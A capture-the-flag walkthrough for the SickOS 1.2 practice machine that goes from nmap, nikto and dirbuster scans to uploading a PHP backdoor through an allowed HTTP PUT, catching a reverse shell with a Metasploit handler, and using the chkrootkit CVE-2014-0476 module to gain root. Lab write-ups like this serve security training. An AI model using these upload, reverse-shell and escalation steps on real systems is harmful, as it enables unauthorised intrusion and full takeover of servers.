Information Security

SickOS 1.2 Walkthrough


SickOS 1.2
This machine can be downloaded from:
Set the Network adapter to NAT if you are using VMware.
Scan for local IP via netdiscover command:
It may different in your lab,
Scan the IP target with nmap as default:
nmap -A -vv -T4
We detect two ports are open 22/tcp and 80/tcp
Scan all TCP ports and for faster usage we can use zenmap:
  • Type zenmap to open zenmap tool
  • Type the IP in target:
  • Choose from profile: Intense scan, all TCP ports
As showing in screen shot:
nmap -p 1-65535 -T4 -A -v
Scan all UDP ports
  • Type the IP in target:
  • Choose from profile:Intense scan plus UDP
We didn’t find useful ports from UDP scan, So we go back to TCP scan.
After we determined the target has 80 port is open so we will browse it.
We run nikto -h to scan the web and detect directory in that host:
    nikto -h
After there is now useful result we run dirbuster with medium word-list
dirubuster to find directories in different tool,
  • Type the target textfiled.
  • Check Go Faster for speed process.
  • Choose the wordlist in /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt.
  • Click Start
Then we detect “test” directory let’s open it in browser
Let’s analyze the page and open view source,
nothing useful, So we can analyze the server side command either via burpsuite or via curl command and use OPTIONS to determine web functions are allowed
#curl -v -X OPTIONS
After we detect that PUT command is allowed, we can put our shell either via burpsuite or via Nmap,
Let us generate shell first
I use ready shell in kali by default using:
    locate shell
Copy shell and rename it as shell.php
    cp /usr/share/webshells/php/php-backdoor.php /root/shell.php
Edit the shell.php via command:
    nano shell.php
    >> kali IP
$port 443 
    >> because 4444 isn’t working
nmap -p 80 –script http-put –script-args http-put.url=’/test/shell.php’,http-put.file=’shell.php’
Successfully created!
Now we have to make listener, in two different way nc -lvp 443 or  metasploit but i prefer metasploit for Privilege Escalation later,
We use payload php/reverse_php  because we generate shell no meterpreter and that works for me,
Set local host (kali IP) and port (443) as we did in shell previously.
Then we type exploit (-jz) to work session in background.
use exploit/multi/handler
set payload php/reverse_php
set LHOST192.168.236.136
set LPORT 442
exploit -jz
Final options:
Then we move to this shell via browser:
Finally we got a user shell!
But with normal user www-data
For Privilege Escalation first we check the current process running and has root privileges:
ls -la
We saw that linechkrootkit has root privileges,
drwxr-xr-x  2 john john  4096 Apr 12  2016 chkrootkit-0.49
After figure out for vulnerability in Google we discovered:
vulnerability of chkrootkit CVE-2014-0476 this could allow me to escalate my privilge.
with metasploit module.
  • use exploit/unix/local/chkrootkit
  • set session 1
After enter following command as shown in given image to load exploit/unix/local/chkrootkit module then set session 1 and arbitrary lport such a 8080 and run the module.
for me i set session 3 because i already opened sessions 1 and 2.
Make sure about lport with options command:
Then type run
session 4 opened ! in my case,
Type id 
To see the privilege account
Now we are root!
open the 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt text for final flag:
cat 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt
I Hope you enjoy it!
contact me twitter: